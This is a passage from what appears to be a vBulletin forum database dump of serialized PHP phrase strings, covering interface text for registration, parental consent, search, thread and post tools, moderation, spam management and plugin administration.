\";s:25:\"enter_valid_email_address\";s:48:\"Please enter a valid email address for yourself.\";s:30:\"entered_passwords_do_not_match\";s:35:\"The entered passwords do not match.\";s:35:\"errors_occurred_during_registration\";s:54:\"The following errors occurred during your registration\";s:29:\"fill_out_both_password_fields\";s:37:\"Please fill out both password fields.\";s:11:\"forum_rules\";s:11:\"Forum Rules\";s:23:\"forum_rules_description\";s:659:\"Although the administrators and moderators of %2$s will attempt to keep all objectionable\r\nmessages off this forum, it is impossible for us to review all messages. All messages express the views of\r\nthe author, and neither the owners of %2$s, nor vBulletin Solutions, Inc. (developers of vBulletin)\r\nwill be held responsible for the content of any message.
\r\n\r\nBy agreeing to these rules, you warrant that you will not post any messages that are obscene, vulgar,\r\nsexually-oriented, hateful, threatening, or otherwise violative of any laws.
\r\n\r\nThe owners of %2$s reserve the right to remove, edit, move or close any thread for any reason.
\";s:24:\"forum_rules_registration\";s:363:\"Forum Rules
\r\n\r\nRegistration to this forum is free! We do insist that you abide by the rules and policies detailed\r\nbelow. If you agree to the terms, please check the \'I agree\' checkbox and press the \'Register\' button below.\r\nIf you would like to cancel the registration, click here \r\nto return to the forums index.
\";s:22:\"if_referred_enter_name\";s:91:\"If you were referred to this site by an existing member of %1$s, enter their username here.\";s:32:\"instructions_for_parent_guardian\";s:301:\"Instructions for a Parent or Guardian \r\n Please print out this page, sign it and fax it to: \r\n %1$s at %2$s \r\n Or mail it to: \r\n %3$s \r\n If approval is not received in 7 days the information will be deleted.\";s:26:\"make_changes_profile_visit\";s:108:\"To make changes to the profile information below, please visit this page and enter the username and password\";s:20:\"optional_information\";s:20:\"Optional Information\";s:25:\"parent_guardian_full_name\";s:27:\"Parent / Guardian Full Name\";s:16:\"parent_signature\";s:9:\"Signature\";s:28:\"parental_permission_required\";s:28:\"Parental Permission Required\";s:30:\"permission_to_participate_at_x\";s:38:\"Permission to Participate at %1$s\";s:26:\"please_enter_a_proper_year\";s:26:\"Please enter a proper year\";s:31:\"please_enter_your_date_of_birth\";s:31:\"Please Enter Your Date of Birth\";s:12:\"privacy_mode\";s:12:\"Privacy Mode\";s:25:\"read_agree_abide_by_rules\";s:50:\"I have read, and agree to abide by the %1$s rules.\";s:13:\"register_at_x\";s:16:\"Register at %1$s\";s:12:\"registration\";s:12:\"Registration\";s:18:\"registration_image\";s:18:\"Registration Image\";s:17:\"relation_to_child\";s:17:\"Relation to Child\";s:20:\"required_information\";s:20:\"Required Information\";s:12:\"select_a_day\";s:12:\"Select a day\";s:14:\"select_a_month\";s:14:\"Select a month\";s:31:\"sign_form_and_send_with_privacy\";s:358:\"Please sign the form below and send it to us. \r\n I have reviewed the information my child has supplied and I have read the Privacy Policy (%1$s) for the web site.\r\n I understand that the profile information may be changed by a using a password.\r\n I understand that I may ask for this registration profile be removed entirely.\";s:34:\"sign_form_and_send_without_privacy\";s:280:\"Please sign the form below and send it to us. \r\n I have reviewed the information my child has supplied.\r\n I understand that the profile information may be changed by a using a password.\r\n I understand that I may ask for this registration profile be removed entirely.\";s:16:\"telephone_number\";s:16:\"Telephone Number\";s:27:\"to_post_must_first_register\";s:194:\"In order to be able to post messages on the %1$s forums, you must first register. \r\n Please enter your desired user name, your email address and other required details in the form below.\";s:21:\"to_proceed_must_agree\";s:61:\"In order to proceed, you must agree with the following rules:\";s:25:\"until_receive_signed_form\";s:297:\"Note Until we receive a signed permission form from your parent or guardian you will be unable to post messages on this forum.
\r\n All of the information you provide on this page will be emailed to you and your parent or guardian with instructions for sending in the approval.
\";s:17:\"username_is_valid\";s:33:\"Username is valid and not in use.\";s:7:\"x_rules\";s:10:\"%1$s Rules\";s:23:\"yes_hides_email_icq_etc\";s:125:\"Selecting \'yes\' hides email, ICQ number, AIM ID, Yahoo ID and MSN ID in profile and also hides you in \'Logged In Users\' list.\";}', 'a:75:{s:11:\"a_month_ago\";s:11:\"A Month Ago\";s:10:\"a_week_ago\";s:10:\"A Week Ago\";s:10:\"a_year_ago\";s:10:\"A Year Ago\";s:20:\"all_posts_below_here\";s:56:\"All posts below here were posted before your last visit.\";s:22:\"all_threads_below_here\";s:100:\"The threads below have not been updated since your last visit or since forums have been marked read.\";s:29:\"all_threads_below_here_unread\";s:93:\"The threads below have not been updated since your last visit but still contain unread posts.\";s:27:\"also_search_in_child_forums\";s:27:\"Also search in child forums\";s:16:\"and_child_forums\";s:16:\"and child forums\";s:9:\"and_newer\";s:9:\"and Newer\";s:9:\"and_older\";s:9:\"and Older\";s:8:\"any_date\";s:8:\"Any Date\";s:8:\"at_least\";s:8:\"At Least\";s:7:\"at_most\";s:7:\"At Most\";s:24:\"clear_search_preferences\";s:24:\"Clear Search Preferences\";s:12:\"deleted_post\";s:12:\"Deleted Post\";s:25:\"do_not_use_cached_results\";s:25:\"Do not use cached results\";s:26:\"errors_occured_with_search\";s:46:\"The following errors occurred with your search\";s:10:\"exact_name\";s:10:\"Exact name\";s:23:\"fields_on_form_optional\";s:283:\"All fields on this form are optional. Most fields will accept a partial input (for example, you could enter Jo into the \'User Name\' field in order to find users called Jo hn, Jo e, Jo seph and Jo lene).\";s:15:\"find_posts_from\";s:15:\"Find Posts from\";s:28:\"find_threads_started_by_user\";s:28:\"Find Threads Started by User\";s:17:\"find_threads_with\";s:17:\"Find Threads with\";s:24:\"find_threads_with_prefix\";s:24:\"Find Threads with Prefix\";s:4:\"help\";s:4:\"Help\";s:18:\"in_ascending_order\";s:18:\"in Ascending Order\";s:19:\"in_descending_order\";s:19:\"in Descending Order\";s:8:\"is_after\";s:8:\"is After\";s:9:\"is_before\";s:9:\"is Before\";s:27:\"is_greater_than_or_equal_to\";s:27:\"is Greater than or Equal to\";s:12:\"is_less_than\";s:12:\"is Less than\";s:9:\"key_words\";s:10:\"Keyword(s)\";s:17:\"last_posting_date\";s:17:\"Last Posting Date\";s:14:\"moderated_post\";s:14:\"Moderated Post\";s:10:\"moderation\";s:10:\"Moderation\";s:17:\"no_unread_threads\";s:28:\"There are no unread threads.\";s:23:\"number_of_users_perpage\";s:24:\"Number of users per-page\";s:12:\"or_no_prefix\";s:12:\"or no prefix\";s:16:\"order_results_by\";s:16:\"Order Results By\";s:17:\"please_use_format\";s:28:\"Please use yyyy-mm-dd format\";s:33:\"please_use_format_yyyymmdd_hhmmss\";s:37:\"Please use format yyyy-mm-dd hh:mm:ss\";s:19:\"posts_from_last_day\";s:19:\"Posts From Last Day\";s:13:\"posts_made_by\";s:13:\"Posts Made By\";s:9:\"relevancy\";s:9:\"Relevancy\";s:23:\"save_search_preferences\";s:23:\"Save Search Preferences\";s:22:\"search_all_open_forums\";s:22:\"Search All Open Forums\";s:18:\"search_by_key_word\";s:17:\"Search by Keyword\";s:13:\"search_by_tag\";s:13:\"Search by Tag\";s:19:\"search_by_user_name\";s:19:\"Search by User Name\";s:19:\"search_entire_posts\";s:19:\"Search Entire Posts\";s:16:\"search_in_forums\";s:18:\"Search in Forum(s)\";s:10:\"search_now\";s:10:\"Search Now\";s:14:\"search_options\";s:14:\"Search Options\";s:24:\"search_subscribed_forums\";s:24:\"Search Subscribed Forums\";s:16:\"search_tag_cloud\";s:16:\"Search Tag Cloud\";s:13:\"search_thread\";s:13:\"Search Thread\";s:21:\"search_took_x_seconds\";s:42:\"Search took %1$s seconds.\";s:32:\"search_took_x_seconds_gen_y_mins\";s:72:\"Search took %1$s seconds; generated %2$s minute(s) ago.\";s:11:\"search_type\";s:11:\"Search Type\";s:15:\"show_results_as\";s:15:\"Show Results as\";s:15:\"sort_results_by\";s:15:\"Sort Results by\";s:9:\"spam_post\";s:9:\"Spam Post\";s:9:\"tag_cloud\";s:9:\"Tag Cloud\";s:41:\"these_are_the_x_most_searched_thread_tags\";s:48:\"These are the %1$s most-searched-for thread tags\";s:37:\"these_are_the_x_most_used_thread_tags\";s:40:\"These are the %1$s most used thread tags\";s:17:\"thread_start_date\";s:17:\"Thread Start Date\";s:25:\"thread_titles_only_search\";s:102:\"You may return further results if you perform a Thread Titles Only search.\";s:18:\"threads_started_by\";s:18:\"Threads Started By\";s:21:\"threads_tagged_with_x\";s:52:\"Threads Tagged with %1$s \";s:27:\"threads_tagged_with_x_title\";s:24:\"Threads Tagged with %1$s\";s:17:\"words_very_common\";s:103:\"The following words are either very common, too long, or too short and were not included in your search\";s:15:\"x_deleted_posts\";s:20:\"%1$s Deleted Post(s)\";s:17:\"x_moderated_posts\";s:22:\"%1$s Moderated Post(s)\";s:12:\"x_months_ago\";s:15:\"%1$s Months Ago\";s:33:\"you_can_only_search_thread_titles\";s:177:\"You can only search in thread titles in the forums marked with an * . Please select \'Search Thread Titles Only\' to include these forums in your search. \";s:15:\"your_last_visit\";s:15:\"Your Last Visit\";}', 'a:60:{s:10:\"add_a_poll\";s:10:\"Add a Poll\";s:25:\"add_a_poll_to_this_thread\";s:25:\"Add a Poll to this Thread\";s:11:\"admin_tools\";s:16:\"Moderation Tools\";s:25:\"already_rated_this_thread\";s:34:\"You have already rated this thread\";s:14:\"approve_thread\";s:14:\"Approve Thread\";s:7:\"average\";s:7:\"Average\";s:3:\"bad\";s:3:\"Bad\";s:9:\"bookmarks\";s:9:\"Bookmarks\";s:15:\"choose_a_rating\";s:15:\"Choose a rating\";s:22:\"click_quick_reply_icon\";s:85:\"Please click one of the Quick Reply icons in the posts above to activate Quick Reply.\";s:12:\"close_thread\";s:12:\"Close Thread\";s:11:\"copy_thread\";s:11:\"Copy Thread\";s:12:\"deleted_post\";s:12:\"Deleted Post\";s:13:\"display_modes\";s:13:\"Display Modes\";s:15:\"email_this_page\";s:15:\"Email this Page\";s:9:\"excellent\";s:9:\"Excellent\";s:4:\"good\";s:4:\"Good\";s:11:\"hybrid_mode\";s:11:\"Hybrid Mode\";s:11:\"linear_mode\";s:11:\"Linear Mode\";s:14:\"moderated_post\";s:14:\"Moderated Post\";s:10:\"moderation\";s:10:\"Moderation\";s:18:\"more_replies_below\";s:35:\"More replies below current depth...\";s:11:\"move_thread\";s:11:\"Move Thread\";s:9:\"next_post\";s:9:\"Next Post\";s:11:\"next_thread\";s:11:\"Next Thread\";s:11:\"open_thread\";s:11:\"Open Thread\";s:12:\"post_deleted\";s:14:\"(Post Deleted)\";s:16:\"post_quick_reply\";s:16:\"Post Quick Reply\";s:31:\"posting_quick_reply_please_wait\";s:33:\"Posting Quick Reply - Please Wait\";s:11:\"prev_thread\";s:15:\"Previous Thread\";s:13:\"previous_post\";s:13:\"Previous Post\";s:22:\"quote_message_in_reply\";s:23:\"Quote message in reply?\";s:16:\"rate_this_thread\";s:16:\"Rate This Thread\";s:6:\"rating\";s:6:\"Rating\";s:16:\"remove_redirects\";s:16:\"Remove Redirects\";s:22:\"remove_text_formatting\";s:22:\"Remove Text Formatting\";s:18:\"search_this_thread\";s:18:\"Search this Thread\";s:22:\"show_printable_version\";s:22:\"Show Printable Version\";s:24:\"show_x_posts_on_one_page\";s:46:\"Show %1$s post(s) from this thread on one page\";s:19:\"show_your_signature\";s:19:\"Show your signature\";s:15:\"similar_threads\";s:15:\"Similar Threads\";s:9:\"spam_post\";s:9:\"Spam Post\";s:12:\"split_thread\";s:12:\"Split Thread\";s:12:\"stick_thread\";s:12:\"Stick Thread\";s:18:\"submit_thread_to_x\";s:21:\"Submit Thread to %1$s\";s:24:\"subscribe_to_this_thread\";s:24:\"Subscribe to this Thread\";s:21:\"switch_to_hybrid_mode\";s:21:\"Switch to Hybrid Mode\";s:21:\"switch_to_linear_mode\";s:21:\"Switch to Linear Mode\";s:23:\"switch_to_threaded_mode\";s:23:\"Switch to Threaded Mode\";s:8:\"terrible\";s:8:\"Terrible\";s:12:\"thread_tools\";s:12:\"Thread Tools\";s:13:\"threaded_mode\";s:13:\"Threaded Mode\";s:14:\"twitter_thread\";s:18:\"Tweet this Thread!\";s:16:\"unapprove_thread\";s:16:\"Unapprove Thread\";s:14:\"unstick_thread\";s:14:\"Unstick Thread\";s:28:\"unsubscribe_from_this_thread\";s:28:\"Unsubscribe from this Thread\";s:31:\"users_viewing_this_thread_x_y_z\";s:107:\"Currently Active Users Viewing This Thread: %1$s (%2$s members and %3$s guests) \";s:17:\"view_first_unread\";s:17:\"View First Unread\";s:16:\"view_single_post\";s:16:\"View Single Post\";s:21:\"you_rated_this_thread\";s:21:\"You Rated this Thread\";}', 'a:31:{s:20:\"add_infraction_for_x\";s:23:\"Add Infraction for %1$s\";s:20:\"add_to_xs_reputation\";s:24:\"Add to %1$s\'s Reputation\";s:14:\"attached_files\";s:14:\"Attached Files\";s:15:\"attached_images\";s:15:\"Attached Images\";s:19:\"attached_thumbnails\";s:19:\"Attached Thumbnails\";s:28:\"attachments_pending_approval\";s:28:\"Attachments Pending Approval\";s:19:\"edit_delete_message\";s:19:\"Edit/Delete Message\";s:11:\"file_type_x\";s:15:\"File Type: %1$s\";s:20:\"find_more_posts_by_x\";s:23:\"Find More Posts by %1$s\";s:7:\"forward\";s:7:\"Forward\";s:26:\"image_larger_version_x_y_z\";s:79:\"Click image for larger version\r\n\r\nName: %1$s\r\nViews: %2$s\r\nSize: %3$s\r\nID: %4$s\";s:11:\"image_x_y_z\";s:37:\"Name: %1$s\r\nViews: %2$s\r\nSize: %3$s\";s:2:\"ip\";s:2:\"IP\";s:26:\"last_edited_by_x_on_y_at_z\";s:60:\"Last edited by %1$s; %2$s at %3$s .\";s:38:\"last_edited_link_by_x_on_y_at_z_postid\";s:79:\"Last edited by %1$s ; %2$s at %3$s .\";s:24:\"multi_quote_this_message\";s:24:\"Multi-Quote This Message\";s:27:\"post_has_been_automoderated\";s:99:\"Thank you for posting! Your post will not be visible until a moderator has approved it for posting.\";s:27:\"quick_reply_to_this_message\";s:27:\"Quick reply to this message\";s:19:\"received_infraction\";s:19:\"Received Infraction\";s:16:\"received_warning\";s:16:\"Received Warning\";s:28:\"remove_user_from_ignore_list\";s:28:\"Remove user from ignore list\";s:16:\"reply_with_quote\";s:16:\"Reply With Quote\";s:15:\"report_bad_post\";s:11:\"Report Post\";s:8:\"reppower\";s:9:\"Rep Power\";s:15:\"send_email_to_x\";s:18:\"Send email to %1$s\";s:12:\"twitter_post\";s:16:\"Tweet this Post!\";s:19:\"view_public_profile\";s:19:\"View Public Profile\";s:17:\"visit_xs_homepage\";s:22:\"Visit %1$s\'s homepage!\";s:9:\"x_until_y\";s:15:\"%1$s until %2$s\";s:7:\"x_views\";s:10:\"%1$s views\";s:9:\"xs_avatar\";s:13:\"%1$s\'s Avatar\";}', 'a:55:{s:13:\"add_moderator\";s:13:\"Add Moderator\";s:11:\"admin_tools\";s:11:\"Admin Tools\";s:9:\"ascending\";s:9:\"Ascending\";s:9:\"beginning\";s:9:\"Beginning\";s:10:\"descending\";s:10:\"Descending\";s:14:\"expires_on_x_y\";s:23:\"Expires on %1$s at %2$s\";s:11:\"forum_tools\";s:11:\"Forum Tools\";s:8:\"from_the\";s:8:\"From The\";s:25:\"hot_thread_with_new_posts\";s:25:\"Hot thread with new posts\";s:28:\"hot_thread_with_no_new_posts\";s:28:\"Hot thread with no new posts\";s:13:\"last_100_days\";s:13:\"Last 100 Days\";s:12:\"last_10_days\";s:12:\"Last 10 Days\";s:11:\"last_2_days\";s:11:\"Last 2 Days\";s:13:\"last_2_months\";s:13:\"Last 2 Months\";s:12:\"last_2_weeks\";s:12:\"Last 2 Weeks\";s:12:\"last_45_days\";s:12:\"Last 45 Days\";s:12:\"last_75_days\";s:12:\"Last 75 Days\";s:8:\"last_day\";s:8:\"Last Day\";s:10:\"last_month\";s:10:\"Last Month\";s:14:\"last_post_time\";s:14:\"Last Post Time\";s:9:\"last_week\";s:9:\"Last Week\";s:9:\"last_year\";s:9:\"Last Year\";s:20:\"mark_this_forum_read\";s:20:\"Mark This Forum Read\";s:9:\"mass_move\";s:9:\"Mass Move\";s:10:\"mass_prune\";s:10:\"Mass Prune\";s:16:\"massmove_threads\";s:17:\"Mass-Move Threads\";s:17:\"massprune_threads\";s:18:\"Mass-Prune Threads\";s:10:\"moderation\";s:10:\"Moderation\";s:22:\"no_posts_in_this_forum\";s:33:\"There are no posts in this forum.\";s:26:\"no_posts_last_x_days_forum\";s:61:\"There have been no posts in the last %1$s days in this forum.\";s:17:\"post_a_new_thread\";s:17:\"Post a New Thread\";s:21:\"post_new_announcement\";s:21:\"Post New Announcement\";s:15:\"post_new_thread\";s:15:\"Post New Thread\";s:6:\"rating\";s:6:\"Rating\";s:17:\"search_this_forum\";s:17:\"Search this Forum\";s:27:\"showing_threads_x_to_y_of_z\";s:36:\"Showing threads %1$s to %2$s of %3$s\";s:10:\"sort_order\";s:10:\"Sort Order\";s:15:\"sort_threads_by\";s:15:\"Sort threads by\";s:9:\"sorted_by\";s:9:\"Sorted By\";s:23:\"subscribe_to_this_forum\";s:23:\"Subscribe to This Forum\";s:40:\"thread_contains_a_message_written_by_you\";s:40:\"Thread Contains a Message Written By You\";s:16:\"thread_is_closed\";s:16:\"Thread is closed\";s:13:\"thread_rating\";s:13:\"Thread Rating\";s:17:\"thread_start_time\";s:17:\"Thread Start Time\";s:12:\"thread_title\";s:12:\"Thread Title\";s:16:\"threads_in_forum\";s:16:\"Threads in Forum\";s:37:\"try_controls_below_for_older_pictures\";s:77:\"Try using the controls below to search for any older pictures that may exist.\";s:34:\"try_controls_below_for_older_posts\";s:74:\"Try using the controls below to search for any older posts that may exist.\";s:21:\"view_attachment_queue\";s:21:\"View Attachment Queue\";s:17:\"view_parent_forum\";s:17:\"View Parent Forum\";s:16:\"view_posts_queue\";s:16:\"View Posts Queue\";s:15:\"x_deleted_posts\";s:20:\"%1$s Deleted Post(s)\";s:18:\"x_members_y_guests\";s:30:\"%1$s members & %2$s guests\";s:17:\"x_moderated_posts\";s:22:\"%1$s Moderated Post(s)\";s:30:\"you_have_posted_in_this_thread\";s:30:\"You have posted in this thread\";}', 'a:45:{s:26:\"add_x_to_your_contact_list\";s:52:\"Add %1$s to your contact list\";s:3:\"aim\";s:3:\"AIM\";s:20:\"aim_hi_are_you_there\";s:18:\"Hi.+Are+you+there?\";s:13:\"email_subject\";s:13:\"Email Subject\";s:15:\"email_to_friend\";s:15:\"Email to Friend\";s:4:\"from\";s:4:\"From\";s:3:\"icq\";s:3:\"ICQ\";s:14:\"message_dialog\";s:14:\"Message Dialog\";s:3:\"msn\";s:3:\"MSN\";s:29:\"msn_functions_only_work_in_ie\";s:178:\"The MSN Messenger / Windows Messenger / Live Messenger functions only work when launched from Internet Explorer on a system with the Messenger application configured and running.\";s:13:\"online_status\";s:13:\"Online Status\";s:5:\"other\";s:5:\"Other\";s:15:\"private_message\";s:15:\"Private Message\";s:23:\"recipient_email_address\";s:23:\"Recipient Email Address\";s:14:\"recipient_name\";s:14:\"Recipient Name\";s:15:\"report_bad_post\";s:11:\"Report Post\";s:26:\"report_bad_private_message\";s:22:\"Report Private Message\";s:33:\"send_email_to_forum_administrator\";s:40:\"Send an Email to the Forum Administrator\";s:12:\"send_message\";s:12:\"Send Message\";s:30:\"send_message_via_aim_to_x_link\";s:80:\"Send Message Via AIM to %2$s \";s:32:\"send_message_via_email_to_x_link\";s:84:\"Send a message via Email to %2$s \";s:30:\"send_message_via_icq_to_x_link\";s:80:\"Send Message Via ICQ to %2$s \";s:30:\"send_message_via_msn_to_x_link\";s:80:\"Send Message Via MSN to %2$s \";s:32:\"send_message_via_skype_to_x_link\";s:89:\"Send Message Via Skype™ to %2$s \";s:23:\"send_message_via_x_to_y\";s:29:\"Send message via %1$s to %2$s\";s:32:\"send_message_via_yahoo_to_x_link\";s:83:\"Send Message Via Yahoo! to %2$s \";s:21:\"send_page_to_a_friend\";s:21:\"Send Page to a Friend\";s:16:\"send_x_a_message\";s:42:\"Send %1$s a message\";s:5:\"skype\";s:12:\"Skype™\";s:17:\"skype_add_contact\";s:25:\"Add to Skype contact list\";s:21:\"skype_leave_voicemail\";s:27:\"Leave voicemail using Skype\";s:15:\"skype_send_file\";s:23:\"Send a file using Skype\";s:16:\"skype_start_call\";s:22:\"Start Skype voice call\";s:16:\"skype_start_chat\";s:21:\"Start Skype text chat\";s:18:\"skype_view_profile\";s:18:\"View Skype profile\";s:27:\"these_functions_require_aim\";s:129:\"Please note that these functions require that you actually have the AOL Instant Messenger application installed on your computer.\";s:27:\"these_functions_require_msn\";s:219:\"Please note that these functions require that you be logged into either MSN Messenger or Windows Messenger. You will not be able to send messages to the email address that you are logged into MSN/Windows Messenger with.\";s:29:\"these_functions_require_skype\";s:104:\"These functions require Skype™ to be installed.\";s:27:\"thought_might_be_interested\";s:122:\"I thought you might be interested in reading this web page:\r\n%1$s/showthread.php?t=%2$s&referrerid=%3$s\r\n\r\nFrom,\r\n%4$s\";s:34:\"using_form_email_available_to_user\";s:100:\"Note: By using this form, your email address will become available to the user who you are emailing.\";s:21:\"view_the_profile_of_x\";s:47:\"View the profile of %1$s \";s:5:\"yahoo\";s:6:\"Yahoo!\";s:45:\"you_must_be_logged_into_msn_before_doing_this\";s:67:\"You must be logged into MSN or Windows Messenger before doing this.\";s:12:\"your_details\";s:12:\"Your Details\";s:9:\"your_name\";s:9:\"Your Name\";}', 'a:80:{s:12:\"affected_ips\";s:21:\"Affected IP Addresses\";s:16:\"affected_ips_are\";s:43:\"The IP addresses used to post the spam are:\";s:14:\"affected_users\";s:14:\"Affected Users\";s:18:\"affected_users_are\";s:36:\"The user(s) who posted the spam are:\";s:48:\"apply_selected_action_to_other_users_sharing_ips\";s:98:\"Apply the selected action to other users registered with or posting from the affected IP addresses\";s:27:\"applying_punitive_action_to\";s:27:\"Applying Punitive Action To\";s:19:\"approve_attachments\";s:19:\"Approve Attachments\";s:16:\"approve_pictures\";s:16:\"Approve Pictures\";s:13:\"approve_posts\";s:13:\"Approve Posts\";s:15:\"approve_threads\";s:15:\"Approve Threads\";s:43:\"asterisk_items_require_further_confirmation\";s:146:\"Options marked with an asterisk (* ) will cause a further confirmation page to be loaded before any action is taken.\";s:12:\"ban_spam_ips\";s:43:\"Ban the IP addresses used to post this spam\";s:9:\"ban_users\";s:15:\"Ban these users\";s:15:\"clear_post_list\";s:18:\"Deselect All Posts\";s:17:\"clear_thread_list\";s:20:\"Deselect All Threads\";s:13:\"close_threads\";s:13:\"Close Threads\";s:10:\"copy_posts\";s:10:\"Copy Posts\";s:18:\"delete_discussions\";s:18:\"Delete Discussions\";s:15:\"delete_messages\";s:15:\"Delete Messages\";s:48:\"delete_other_posts_and_threads_by_affected_users\";s:60:\"Delete other posts and threads started by the affected users\";s:15:\"delete_pictures\";s:15:\"Delete Pictures\";s:20:\"delete_posts_as_spam\";s:20:\"Delete Posts as Spam\";s:11:\"delete_spam\";s:11:\"Delete Spam\";s:14:\"delete_threads\";s:14:\"Delete Threads\";s:22:\"delete_threads_as_spam\";s:22:\"Delete Threads as Spam\";s:26:\"deleting_the_first_message\";s:70:\"Deleting the first message in a discussion will delete the discussion.\";s:23:\"deleting_the_first_post\";s:78:\"Deleting the first post of a thread will result in the deletion of the thread.\";s:43:\"deleting_x_discussions_from_y_social_groups\";s:52:\"Deleting %1$s discussions from %2$s social group(s).\";s:35:\"deleting_x_messages_from_y_pictures\";s:46:\"Deleting %1$s message(s) from %2$s picture(s).\";s:40:\"deleting_x_messages_from_y_user_profiles\";s:51:\"Deleting %1$s message(s) from %2$s user profile(s).\";s:57:\"deleting_x_messages_in_y_discussions_from_z_social_groups\";s:73:\"Deleting %1$s message(s) in %2$s discussion(s) from %3$s social group(s).\";s:33:\"deleting_x_pictures_from_y_albums\";s:43:\"Deleting %1$s picture(s) from %2$s album(s)\";s:12:\"deselect_all\";s:29:\"Deselect All\";s:21:\"deselect_all_pictures\";s:21:\"Deselect All Pictures\";s:10:\"do_nothing\";s:10:\"Do nothing\";s:27:\"do_what_with_affected_users\";s:52:\"What do you want to do to the %1$s affected user(s)?\";s:14:\"from_this_page\";s:17:\"From This Page...\";s:21:\"give_users_infraction\";s:30:\"Give these users an infraction\";s:16:\"invert_selection\";s:33:\"Invert Selection\";s:11:\"merge_posts\";s:11:\"Merge Posts\";s:13:\"merge_threads\";s:13:\"Merge Threads\";s:23:\"moderated_thread_prefix\";s:10:\"Moderated:\";s:10:\"moderation\";s:10:\"Moderation\";s:10:\"move_posts\";s:10:\"Move Posts\";s:12:\"move_threads\";s:12:\"Move Threads\";s:35:\"no_punitive_action_users_are_guests\";s:76:\"All selected users are guests, therefore no punitive actions can be applied.\";s:23:\"only_first_post_is_spam\";s:129:\"Only the first post in each thread will be treated as spam. Any subsequent posts will be deleted, but will not be marked as spam.\";s:12:\"open_threads\";s:12:\"Open Threads\";s:24:\"permanently_remove_items\";s:24:\"Permanently remove items\";s:18:\"place_ban_users_in\";s:24:\"Place banned users in to\";s:15:\"punitive_action\";s:15:\"Punitive Action\";s:32:\"punitive_actions_still_performed\";s:73:\"All punitive actions that affected other users have still been performed.\";s:20:\"registered_x_posts_y\";s:83:\"Registered: %1$s; Posts: %2$s\";s:26:\"save_users_from_punishment\";s:88:\"You may save any of these users from punishment by removing the check next to their name\";s:10:\"select_all\";s:27:\"Select All\";s:21:\"select_closed_threads\";s:38:\"Select Closed Threads\";s:20:\"select_deleted_posts\";s:37:\"Select Deleted Posts\";s:22:\"select_deleted_threads\";s:39:\"Select Deleted Threads\";s:24:\"select_posts_from_guests\";s:41:\"Select Posts from Guests \";s:29:\"select_posts_with_attachments\";s:46:\"Select Posts with Attachments \";s:21:\"select_sticky_threads\";s:38:\"Select Sticky Threads\";s:31:\"select_threads_with_attachments\";s:48:\"Select Threads with Attachments \";s:25:\"select_threads_with_polls\";s:42:\"Select Threads with Polls \";s:23:\"select_unapproved_posts\";s:40:\"Select Unapproved Posts\";s:25:\"select_unapproved_threads\";s:42:\"Select Unapproved Threads\";s:15:\"spam_management\";s:15:\"Spam Management\";s:36:\"spam_management_remove_posts_warning\";s:134:\"You will remove all posts for the selected users, those with more than %1$s posts will need to be removed via the admin control panel.\";s:13:\"stick_threads\";s:13:\"Stick Threads\";s:31:\"submit_data_to_antispam_service\";s:32:\"Submit data to Anti-Spam Service\";s:21:\"unapprove_attachments\";s:21:\"Unapprove Attachments\";s:18:\"unapprove_pictures\";s:18:\"Unapprove Pictures\";s:15:\"unapprove_posts\";s:15:\"Unapprove Posts\";s:17:\"unapprove_threads\";s:17:\"Unapprove Threads\";s:14:\"undelete_posts\";s:14:\"Undelete Posts\";s:16:\"undelete_threads\";s:16:\"Undelete Threads\";s:15:\"unstick_threads\";s:15:\"Unstick Threads\";s:27:\"users_too_many_post_warning\";s:111:\"The following users had more than 50 posts and these posts will need to be removed via the admin control panel.\";s:19:\"view_selected_posts\";s:19:\"View Selected Posts\";s:21:\"view_selected_threads\";s:21:\"View Selected Threads\";s:8:\"x_y_by_z\";s:19:\"(%1$s) %2$s by %3$s\";}', 'a:64:{s:18:\"add_import_product\";s:18:\"Add/Import Product\";s:30:\"add_new_install_uninstall_code\";s:30:\"Add New Install/Uninstall Code\";s:14:\"add_new_plugin\";s:14:\"Add New Plugin\";s:15:\"add_new_product\";s:15:\"Add New Product\";s:26:\"add_new_product_dependency\";s:26:\"Add New Product Dependency\";s:31:\"allow_overwrite_upgrade_product\";s:91:\"Allow OverwriteIf you wish to upgrade a product, you must set this to yes. \";s:36:\"are_you_sure_want_to_delete_plugin_x\";s:160:\"Are you sure you want to delete the plugin called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:37:\"are_you_sure_want_to_delete_product_x\";s:164:\"Are you sure you want to uninstall the product called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:13:\"check_version\";s:13:\"Check Version\";s:24:\"click_here_for_more_info\";s:32:\"Click here for more information!\";s:20:\"compatibility_starts\";s:20:\"Compatibility Starts\";s:33:\"compatibility_starts_with_version\";s:33:\"Compatibility Starts With Version\";s:26:\"compatible_starting_with_x\";s:29:\"Compatible starting with %1$s\";s:15:\"dependency_type\";s:15:\"Dependency Type\";s:13:\"edit_plugin_x\";s:44:\"Edit Plugin %1$s \";s:14:\"edit_product_x\";s:45:\"Edit Product %1$s \";s:31:\"existing_install_uninstall_code\";s:31:\"Existing Install/Uninstall Code\";s:29:\"existing_product_dependencies\";s:29:\"Existing Product Dependencies\";s:13:\"hook_location\";s:13:\"Hook Location\";s:18:\"hook_location_desc\";s:102:\"This specifies the location within the vBulletin code of the hook that will fire this plugin function.\";s:22:\"import_plugin_xml_file\";s:34:\"Import Plugin Definitions XML File\";s:14:\"import_product\";s:14:\"Import Product\";s:17:\"importing_plugins\";s:28:\"Importing Plugin Definitions\";s:17:\"importing_product\";s:17:\"Importing Product\";s:17:\"incompatible_with\";s:17:\"Incompatible With\";s:35:\"incompatible_with_version_and_newer\";s:58:\"Incompatible With Version\r\n(And newer versions) \";s:31:\"incompatible_with_x_and_greater\";s:34:\"Incompatible with %1$s and greater\";s:12:\"install_code\";s:12:\"Install Code\";s:18:\"installed_products\";s:18:\"Installed Products\";s:17:\"installed_version\";s:17:\"Installed Version\";s:14:\"latest_version\";s:14:\"Latest Version\";s:13:\"mysql_version\";s:13:\"MySQL Version\";s:11:\"php_version\";s:11:\"PHP Version\";s:18:\"plugin_active_desc\";s:122:\"If this plugin is marked as inactive, it will not be called by vBulletin. Use this to temporarily turn plugins on and off.\";s:16:\"plugin_code_desc\";s:67:\"Use this field to enter the PHP code that you would like to be run.\";s:22:\"plugin_execution_order\";s:15:\"Execution Order\";s:39:\"plugin_inactive_due_to_product_disabled\";s:99:\"This plugin is currently inactive due to the product %1$s being disabled. \";s:16:\"plugin_is_active\";s:16:\"Plugin is Active\";s:17:\"plugin_order_desc\";s:82:\"Use this field to enter the order in which code at the same hook will be executed.\";s:15:\"plugin_php_code\";s:15:\"Plugin PHP 